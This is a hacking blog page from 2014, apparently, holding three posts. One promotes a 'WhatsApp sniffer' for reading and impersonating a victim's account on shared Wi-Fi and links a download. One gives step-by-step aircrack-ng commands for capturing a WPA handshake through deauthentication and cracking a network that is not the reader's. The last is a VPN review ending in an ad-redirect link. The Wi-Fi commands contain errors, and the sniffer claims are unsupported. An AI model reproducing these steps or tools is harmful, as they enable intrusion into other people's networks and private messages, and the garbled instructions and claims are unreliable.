Showing posts with label linux. Show all posts
Showing posts with label linux. Show all posts

Monday, July 7, 2014

Whatsapp hack sniffer

whatsapp


Hello to all APAJR Lab readers in last post i describe about how to protect your whatsapp account getting hack from your enemies or Hackers. Today i am going to show you How to hack your victim Whatsapp account using whatsapp sniffer and wifi.  Whatsapp sniffer is a tools used for hack a whatsapp account to read conservation, images, videos and chats. This whatsapp sniffer method only work when victim on same wifi network (open/wep/wpa/wpa2).

Requirement:

  • Rooted android phone
  • Supported platform ( Android, Nokia, IOS,) May we work on windows (Not rested). Not work on blackberry
  • You and Victim in same wifi network
  • Wifi security (Open/wep/wpa/wpa2)


How it work :


Whatsapp sniffer hack your victim whatsapp account, when both (you and your victim) in same wifi network (open/wep/wpa/wpa2). Whatsapp sniffer capture all packet and cookies from your victim device using whatsapp server and sent to your device. so your able to access your victim whatsapp account.

What we can do with whatsapp sniffer tools  :


your able to read all conservation, images, videos and your also able to chat with your victim account and contact. Your eligible to change your victim Names and personal information on whatsapp.




download here

Friday, April 18, 2014

Hack wifi using backtrack (O.S)


Hack wifi using backtrack (O.S)

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjehAu9NPf5QuhCLMfjSYVnvQLy9BgeCa4-8FraLjWJuxqEIR_0dZRGP-k7Rrj2Cm_KMT32fyM6tEfID_nCHRpJLuh8n-F8dky49Z2u-ZQhw58tgr5TYF55quujov6RXjHH2FziAt-rMQs0/s1600/Backtrack.png


Step1 : Open a new terminal and type if config     
 
Step 2 : Now we are going to down the server and pass our mac addresses.  To do so enter 
ifconfig wlan0 down.
 
Step 3 : Now pass the mac addresses by using the command -m 00:11:22:33:44:55 wlan0
   
     
Step 4 : Now we are going to start hacking the wifi.  Remember wep is less secured than wpa. Now enter  airmon-ng start wlan0       

                                                                        
Step 5 : Now we can see that monitor mode is enabled. Now to scan for wireless network enter  the command airodump-ng mon0
Step 6: When you enter this command a screen will scan all the wirelesses network . When you find your wifi which you want to hack press ctrl+c to stop scan.  Now copy the bssid of the required wifi.





Step 7 : Now we are going to pass the data to do so enter the command remember you must give your bssid and channel airdump-ng  --bssid 00:23:69:98:AC:05 -c 4 hackwpa mon0


Step 8: Now a page will appear which will send and receive data .  Wait till the limited data is send and recivied .


Step 9:  Dont close the above terminal. Now open a new terminal and enter the command which is to get replay  aireplay-ng  -0 30 -a 00:23:69:98:AC:05 mon0



Step 10 : Now open that terminal which was sending and reciving data . wpa handshake  will be created.


Step 11:  Now open a new terminal and here iam using wordlist if dont have wordlist you can use brutforce and rainbow attack also.Heare Iam using dictionary attack, enter the command to hack
aircrack-ng -w wordlist -b 00:23:69:98:AC:05 hackwpa*.cap

Step 12 : Now you have hacked wifi.





 

Thursday, April 17, 2014

Download Hotspot shield vpn

Download Hotspot shield to change your ip

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpo1E8FtNKwmUVd39Cdl1scsizr6nxWgTpfJe8btghibUV9ARq-e-roLQSRr_-S-J_ALfUIv7Wwg9Dlyg46Znie6AqK6tMWhy7iMrACOL7z8cqz1RjKalvCAMLQmzszbc2BVNF55qvZqg/s1600/hotpost+shield.jpg



Hotspot Shield is a free tool and service that lets you connect to the Internet via Virtual Private Network (VPN). Hotspot Shield is mainly geared toward those who want a more secure connection when accessing the Internet from public Wi-Fi hotspots.

Pros

Value: Hotspot Shield is one of the largest free VPN services in the world. Though the free version is ad-supported, the paid Elite tier comes at an affordable price, with cross-platform support.

Customizable: Hotspot Shield allows you to connect from other countries. This not only helps to shield your connection origins, but it also potentially lets you access content that's available only from certain global regions.

Control: Hotspot Shield's dashboard gives you an overview of the protection status and data speeds for both uploads and downloads, allowing you to monitor your connection performance.

Cons

Ad disruptive: Hotspot Shield Free occasionally shows up as a pop-up or header on the top of your browser. While this window may be closed, it does become rather tedious to have to close it every time.

Limited connection: The free version does not allow you to connect from other locations or regions.

Bottom Line

Hotspot Shield is a lightweight VPN solution that we recommend for anyone who's even slightly concerned about privacy. The free version may be riddled with a few ads, but it's a service that's worth the price, especially if you find yourself frequently accessing the Internet from public places. Hotspot Shield is a valuable service and remains competitive with other premium VPN services.

You may also like : RAR Password recovery 

http://adfoc.us/22615841923045